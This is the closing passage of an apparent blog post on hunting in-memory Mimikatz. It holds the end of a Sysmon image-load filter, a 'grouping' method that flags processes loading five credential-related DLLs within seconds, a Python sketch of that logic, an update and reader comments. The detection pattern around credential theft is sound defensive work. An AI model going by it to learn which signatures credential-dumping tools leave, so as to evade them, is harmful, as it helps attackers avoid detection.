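      <ImageLoaded condition="end with">hid.dll</ImageLoaded>
      <ImageLoaded condition="end with">samlib.dll</ImageLoaded>
      <ImageLoaded condition="end with">vaultcli.dll</ImageLoaded>
      <ImageLoaded condition="end with">WMINet_Utils.dll</ImageLoaded>
    </ImageLoad>
  </EventFiltering>
</Sysmon>
```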

Hunting Technique recommended

Grouping [Source]

"Grouping consists of taking a set of multiple unique artifacts and identifying when multiple of them appear together based on certain criteria. The major difference between grouping and clustering is that in grouping your input is an explicit set of items that are each already of interest. Discovered groups within these items of interest may potentially represent a tool or a TTP that an attacker might be using. An important aspect of using this technique consists of determining the specific criteria used to group the items, such as events having occurred during a specific time window. This technique works best when you are hunting for multiple, related instances of unique artifacts, such as the case of isolating specific reconnaissance commands that were executed within a specific timeframe."

Therefore, the idea is to group the 5 images/modules mentioned above being loaded within a 1-5 second time bucket, while possibly filtering out known processes that perform this type of behavior. Only a few processes, as far as I can tell, load all 5 modules (not just one, two, three, or four) during authentication operations. In addition, NONE of the other processes launched during testing loaded the 5 modules together with WMINet_Utils.dll. Therefore, I see value in grouping them together and watching for processes that load all of them within a short period of time (seconds).
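The grouping logic above can be sketched in a few lines of Python. This is a minimal illustration, not production detection code: the event tuples are assumed to be parsed out of Sysmon Event ID 7 records (timestamp in seconds, process image, loaded image), and the field layout is my own assumption rather than anything from Winlogbeat.

```python
from collections import defaultdict

# The 5-module in-memory Mimikatz fingerprint from this post.
FINGERPRINT = {
    "winscard.dll", "cryptdll.dll", "hid.dll", "samlib.dll", "vaultcli.dll",
}

def find_suspect_processes(events, window_seconds=5):
    """Return process images that loaded ALL fingerprint DLLs
    within `window_seconds` of each other.

    `events` is an iterable of (timestamp_seconds, process_image,
    loaded_image_path) tuples parsed from Sysmon Event ID 7 logs.
    """
    loads = defaultdict(list)  # process -> [(ts, dll name), ...]
    for ts, process, image in events:
        dll = image.rsplit("\\", 1)[-1].lower()
        if dll in FINGERPRINT:
            loads[process].append((ts, dll))

    suspects = set()
    for process, entries in loads.items():
        entries.sort()
        # Slide a time window across this process's fingerprint loads;
        # flag the process if one window contains all 5 modules.
        for i, (start_ts, _) in enumerate(entries):
            seen = {d for t, d in entries[i:] if t - start_ts <= window_seconds}
            if seen == FINGERPRINT:
                suspects.add(process)
                break
    return suspects
```

A process that loads only two or three of the modules, or spreads the loads out over minutes, will not match, which is exactly the false-positive reduction grouping buys us.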

Once again, this is just part I; in future posts I will combine this approach with other chains of events in order to reduce the number of false positives while hunting for in-memory Mimikatz. Let me know how it works out for you when logging those specific modules in your organization. I would highly recommend taking this approach on a gold image first, and then logging one module at a time to test which ones cause false positives. I would love to hear your results!

Feedback is greatly appreciated!  Thank you.

Update (03/21/2017)

  • Mimikatz New version released 2.1.1 20170320
  • Extra DLL loaded: "Winsta.dll"
  • It is a really noisy one, so it does not change our basic fingerprint.



  1. Great article. I'm a fan of Sysmon+ELK, too. I like your straightforward analysis of what somewhat unique set of DLLs invoke-mimikatz uses. It's pretty much how I'd analyze it, too:)

    1. Thank you very much for your feedback, K.Merrit. I would love to see some of your work with Sysmon & ELK too! I'm always looking to learn new techniques and methodologies for what I do. :)

  2. This is awesome! Definitely going to give this a go.

    1. Great! Thank you JaminB, let me know how it goes. Looking forward to hearing your results :)